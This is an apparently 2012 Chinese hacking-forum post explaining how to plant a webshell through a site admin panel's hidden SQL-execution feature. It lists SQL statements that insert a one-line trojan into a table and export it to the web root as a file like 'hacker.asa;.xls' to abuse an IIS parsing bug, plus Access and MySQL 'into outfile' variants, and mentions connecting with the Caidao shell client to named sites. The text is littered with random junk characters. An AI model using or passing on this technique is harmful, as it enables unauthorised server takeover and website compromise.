好不容易进了后台,发现啥上传啊。备份啊多木有。
3 C2 q: Y! D9 g# R6 Kwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的5 W4 n$ `* a3 Z
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,3 ~* \2 E6 f; I+ i4 N$ L+ l
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:$ [# l& o0 d$ E# d7 n: I5 Y
1.create table cmd (a varchar(50))3 T' c! ?: V9 r) @
2.insert into cmd (a) values (‘‘)
, [ y) n* g* X' A" B/ B3 |3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd. K' Z/ ^( G; e3 [, n: F4 `
(把表cmd的内容导出为物理路径的一个EXCEL文件) R& g3 |; M; f4 ]5 y
4.drop table cmd
; n" ?; x, \/ o5 `) B1 W$ _利用IIS的BUG成功拿到了WEBSHELL。
, y: }$ B$ S. E
6 r5 {; I' j; P# R" e直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话 T% O1 Q/ ~+ ^& r$ K8 w8 T
; _, D; D' | [; l6 X( Y- k SQL语句意思解释:
' H" ~5 Q- c ?7 k 第一句
# j& [/ `$ a0 S5 Q( j% H 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
6 N5 \( J! L. O& R7 t& n1 w* b% d! X, c* S; C; h
第二句
6 E+ a E( ~6 U. S. b 在表cmd的a字段插入一句话木马4 }1 t+ O. M$ g
第三句2 z# L* r1 P! Q4 H, o
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件: M4 O- n$ C* _* p6 T
3 c' J: L. q3 ^ 第四句* i; \- U0 w- J3 g
删除建立的cmd表
' j; W/ `) z" ?/ F1 p2 {5 d0 M3 T3 d: K& E7 E0 U
以下内容为测试:
) h) c2 q! D8 a# Z6 E Access利用后台SQL执行命令功能导出WebShell:4 T! \- {/ c! C$ z- ^
这个更简单:
- _* ^* S2 {: o/ Q- Q5 B$ J5 A- V [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
& F/ p/ N6 n5 a: M 或者8 {" L3 m W7 h$ T1 x5 Z0 K
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]# ~8 h! C8 E3 m' {, `* F. e, ]
. E: {7 W4 O. L' r. @ 后台有执行SQL语句功能(vote为已知表段)
7 R t: g% j# {, s6 x. n; p8 J" c- @1 V 希望对大家有所帮助拿shell的又一个思路' M9 X: ]/ z7 n
|
发表于 2012-9-13 17:53:58
收藏
支持
反对